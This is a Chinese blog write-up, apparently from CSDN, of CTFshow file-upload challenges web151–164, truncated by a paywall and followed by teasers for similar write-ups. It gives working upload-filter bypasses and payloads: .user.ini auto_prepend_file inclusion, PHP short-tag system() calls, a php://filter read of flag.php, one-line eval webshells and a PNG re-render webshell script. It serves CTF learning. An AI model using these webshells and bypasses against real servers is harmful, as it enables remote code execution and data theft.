[CTFSHOW]文件上传

最新推荐文章于 2024-07-11 16:21:08 发布
最新推荐文章于 2024-07-11 16:21:08 发布
阅读量274 收藏
点赞数
分类专栏: 刷题记录
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51078229/article/details/114994671
版权
本文介绍了多个CTF挑战中关于文件上传的攻防策略,包括通过修改文件后缀、利用.user.ini文件、PHP短标签、反引号、php伪协议、文件包含漏洞、.htaccess配置等手段,绕过过滤机制执行PHP代码,获取flag。
摘要由CSDN通过智能技术生成

web 151

看源码是js判断文件类型进行拦截,先上传一个图片,再抓包改成php文件后缀就可以了,当然内容也删掉,留下php代码
在这里插入图片描述

web 152

和上题一样的解法

web 153

和上面一样的解法直接改后缀就没用了
在这里插入图片描述
测试了一下,发现是黑名单的过滤
在这里插入图片描述
所以就上传.htaccess文件把png文件解析成php
在这里插入图片描述
但是很遗憾,用不了
在这里插入图片描述
引用一波羽大佬的wp:

本题考点为.user.ini,详细配置可以参考官方文档
如果你目录下有user.ini会先去识别里面的配置,但是只有 PHP_INI_PERDIR 和 PHP_INI_USER 模式可以

找到这两个auto_append_fileauto_prepend_file,作用:
一个相当于在每个php文件尾加上 include(“xxxx”)
一个相当于文件头加上 include(“xxx”)
其中xxx就是 auto_append_file的值。

现在回到这个题。为了利用auto_append_file,我们首先上传一个带木马的图片,接着上传.user.ini内容为 auto_append_file=“xxx” xxx为我们上传的文件名。
这样就在每个php文件上包含了我们的木马文件。

在这里插入图片描述

在这里插入图片描述
因为upload有index.php,所以这个php就会添加一个include(“1.png”),就会包含到木马

然后开蚁剑连到upload就可以了

web 154

传的时候改后缀和content-type不行了,会识别内容
在这里插入图片描述
用script也不行,估计是把php给ban了,所以就用php短标签,直接传system命令
先传.user.ini
在这里插入图片描述
再传一个system命令

<?=system("tac ../f*")?>

在这里插入图片描述

访问/upload就得到了flag

web 155、156

做法同上
155还可以传post[],166不行了

web 157

ban了分号;
只用一个system不加分号也可以

<?=system("cat ../flag*")

web 158

过滤了括号,用反引号直接指向命令
在这里插入图片描述

web 159

  • php伪协议配合文件包含与.user.ini的利用

先传了一个.user.ini

auto_prepend_file=shell.png

再传图片上去,内容是
由于php被过滤,这里就用.号来绕过,在利用php伪协议进行文件的读取

<?= include"ph"."p://filter/read=convert.base64-encode/resource=../flag.ph"."p"?>

在这里插入图片描述
访问/upload/index.php,成功得到flag
在这里插入图片描述

web 160

在上一题的基础上过滤了空格,把空格换成tab就可以绕过(其实也用不上空格)
在这里插入图片描述

web 161-163

不知道为啥什么东西都传不上了,正常图片也传不上,就先放着了

web 164

  • 考察图片马二次渲染

这里是png的二次渲染
脚本:

<?php

/*<?$_GET[0]($_POST[1]);?>*/

$p = array(0xa3, 0x9f, 0x67, 0xf7, 0x0e, 0x93, 0x1b, 0x23,
    0xbe, 0x2c, 0x8a, 0xd0, 0x80, 0xf9, 0xe1, 0xae,
    0x22, 0xf6, 0xd9, 0x43, 0x5d, 0xfb, 0xae, 0xcc,
    0x5a, 0x01, 0xdc, 0x5a, 0x01, 0xdc, 0xa3, 0x9f,
    0x67, 0xa5, 0xbe, 0x5f, 0x76, 0x74, 0x5a, 0x4c,
    0xa1, 0x3f, 0x7a, 0xbf, 0x30, 0x6b, 0x88, 0x2d,
    0x60, 0x65, 0x7d, 0x52, 0x9d, 0xad, 0x88, 0xa1,
    0x66, 0x44, 0x50, 0x33);



$img = imagecreatetruecolor(32, 32);

for ($y = 0; $y < sizeof($p);
最低0.47元/天 解锁文章
huamanggg
关注
专栏目录
ctfshow文件上传
weixin_53955759的博客
04-15 797
web151 前台校验不可靠,前端验证 上传png,抓包改文件名为.php 成功,蚁剑连接得到falg web152 更改Content-Type即可 蚁剑连接,得到flag web153 利用上传user.ini进行文件上传绕过。 自 PHP 5.3.0 起,PHP 支持基于每个目录的 INI 文件配置。此类文件 仅被 CGI/FastCGI SAPI 处理。此功能使得 PECL 的 htscanner 扩展作废。如果你的 PHP 以模块化运行在 Apache 里,则用 .htaccess 文件有同样
CTFshow 文件上传 web162
Kradress的博客
02-15 2148
目录思路总结 思路 大致思路和上题类似,不过在上传.user.ini的时候发现.被过滤了,可以把包含的文件不带后缀来绕过 .user.ini GIF89a auto_prepend_file=png png GIF89a <?=require~%9b%9e%8b%9e%c5%d0%d0%8b%9a%87%8b%d0%8f%93%9e%96%91%d3%c3%c0%8f%97%8f%df%8c%86%8c%8b%9a%92%d7%d8%8b%9e%9c%df%d1%d1%d0%99%d5%d8%
CTFSHOW 文件上传
qq_51754713的博客
02-27 393
开启文件上传 先补充一些知识 1.一句话木马 <?php @eval($_POST['attack']) ?> 只要一句话脚本上传到了服务器当中,我们就可以使用中国蚁剑或者中国菜刀链接并控制整个服务器。 2.中国蚁剑的使用 此处添加的url为我们一句话脚本所在的url,连接密码就是我们定义的_POST中的变量,如上面就是attack。 web152 解题思路:上传我们做好的含有一句话木马的图片,然后抓包修改发送包的类型为php,用蚁剑连接。 知识点: ①一句话木马的制作:我们使用Notepa
ctfshow-web入门-文件上传(web166、web167)&(web168-web170)免杀绕过
最新发布
Welcome To Myon'Blog !
07-11 1115
查看源码,前端只让传 zip上传 zip 成功后可以进行下载随便搞一个压缩包,使用记事本编辑,在其内容里插入一句话木马:上传该压缩包,上传成功后点击下载文件,使用 burpsuite 抓包:我这里木马内容用的 request ,就在 get 里执行 ls 什么问题,但是读取 flag 时识别有点问题,最好使用 post 请求,因此将请求方法改为 post ,将 file 的内容还原到上面。
CTFShow文件上传
paidx0
08-07 442
CTFShow文件上传 web151 前端直接抓包改就行 web152 同上 web153 利用上传.user.ini进行文件上传绕过 php.ini是php的一个全局配置文件,对整个web服务起作用; 而.user.ini和.htaccess一样是目录的配置文件,.user.ini就是用户自定义的一个php.ini, 通常用这个文件来构造后门和隐藏后门。 **利用.user.ini,要求目标目录下必须包含php文件** .user.ini的内容为auto_append_file=1.png,意思就是使1
ctfshow 文件上传
qq_52671379的博客
04-06 390
ctfshow 文件上传
ctfshow——文件上传
qq_55202378的博客
12-27 1382
之外,php还会在每个目录下扫描INI文件,从被执行的PHP文件所在目录开始一直上升到web根目录($_SERVER[‘DOCUMENT_ROOT’]所指定)。的组件库,url代表上传接口,accept代表允许上传的文件类型,exts代表允许上传的文件后缀。风格的 INI 文件中只有具有 PHP_INI_PERDIR 和 PHP_INI_USER 和PHP_INI_ALL模式的 INI 设置可被识别。,上传一个png的webshell,再使用burp抓包更改文件后缀名,再访问上传的webshell。
CTFshow 文件上传 web153
Kradress的博客
02-15 1798
目录思路总结 思路 先上传带shell的png文件,上传成功 把文件后缀改成php,上传失败,改成xxxxx上传成功,得知是黑名单过滤, 上传phtml后缀,可以成功上传,但是无法解析,可以试试上传配置文件,访问upload,发现有可执行文件index.php,可以用上传.user.ini来进行文件包含(题目是nginx) user.ini.它比.htaccess用的更广,不管是nginx/apache/IIS,只要是以fastcgi运行的php都可以用这个方法。 条件: 服务器脚本语言为PHP
CTFshow 文件上传 web164
Kradress的博客
02-16 960
目录思路总结 思路 直接在burp里面改target和host的值,或者在本地发包 多次尝试后,发现除了正常的png图片,都无法上传,猜测用图片马上传 https://github.com/huntergregal/PNG-IDAT-Payload-Generator 虽然上传成功,但把后缀改成任意字符串却被拦截,猜测是白名单 .user.ini也无法正常上传,应该有其他的点可以利用. 直接在网站上上传图片马后,发现显示查看图片 点击查看图片后,跳转到/download.php?imag
CTFSHOW文件上传(可能也是持续更新)
Npceer-一位网安初学者的博客
02-14 271
文件上传0x01 web 151 0x01 web 151 按照hint去试了下 写一句话 然后改png 上传 抓包把后缀改成php 然后就上传成功了 然后 我太菜了 不会玩 还想用菜刀呢 然后报错了 仔细看原因 接着访问url/upload/**.php(你自己写进去的文件名字) 我用的hackbar 从羽大佬博客学了一下 因为我自己用system+cat不知道为啥半天弄不出 ...
CTFSHOW-文件上传
Monica的博客
10-03 3681
环境要求: allow_url_fopen=On(默认为On) 规定是否允许从远程服务器或者网站检索数据 allow_url_include=On(php5.2之后默认为Off) 规定是否允许include/require远程文件 WEB78 <?php if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } 分析:
CTFSHOW 文件上传
m0_64180167的博客
11-14 354
直接上传 png的图片马然后抓包修改为php。
CTFshow-文件上传
qq_61376069的博客
01-22 561
CTFshow入门——文件上传
CTFshow_文件上传
qq_45927819的博客
11-29 3143
文章目录web151web152web153 web151 上传图片,经过测试只能上传后缀为png的图片 抓包改数据: 使用蚁剑连接: 找到flag! web152 做法和上题一样! web153 继续之前的操作,但并有上传成功:
ctfshow---文件上传
fainpo的博客
04-10 638
来到文件上传了。
CTFshow | 文件上传
m0_60651303的博客
08-04 794
var/log/nginx/ 目录是 NGINX 的默认日志位置,可以从中找到一个 access.log 文件和 error.log 文件,include函数包含日志查看日志内容。2、看一下upload文件下有index.php,说明可以通过.user.ini文件来上传。文件上传漏洞是指用户上传了一个可执行的脚本文件,而且通过这个脚本文件获得了执行服务端命令的能力。1、几经尝试,发现php不能通过,phP可以通过,说明过滤掉了php。过滤了php,system,{},和分号,直接执行命令。
CTFSHOW 文件上传(学习记录)
ximo的博客
02-16 812
目录Web 151Web 152Web 153Web 154Web 155Web 156Web 157Web 158Web 159Web 160Web 161Web 162Web 163Web 164Web 165Web 166Web 167Web 168Web 169Web 170 Web 151 前端验证,抓包修改数据OK Web 152 直接上传一句话木马,连接即可 Web 153 参考链接: 文件上传漏洞——.htaccess和.user.ini配置文件的应用 因为该环境是nginx搭建的,所以.h
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

huamanggg

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值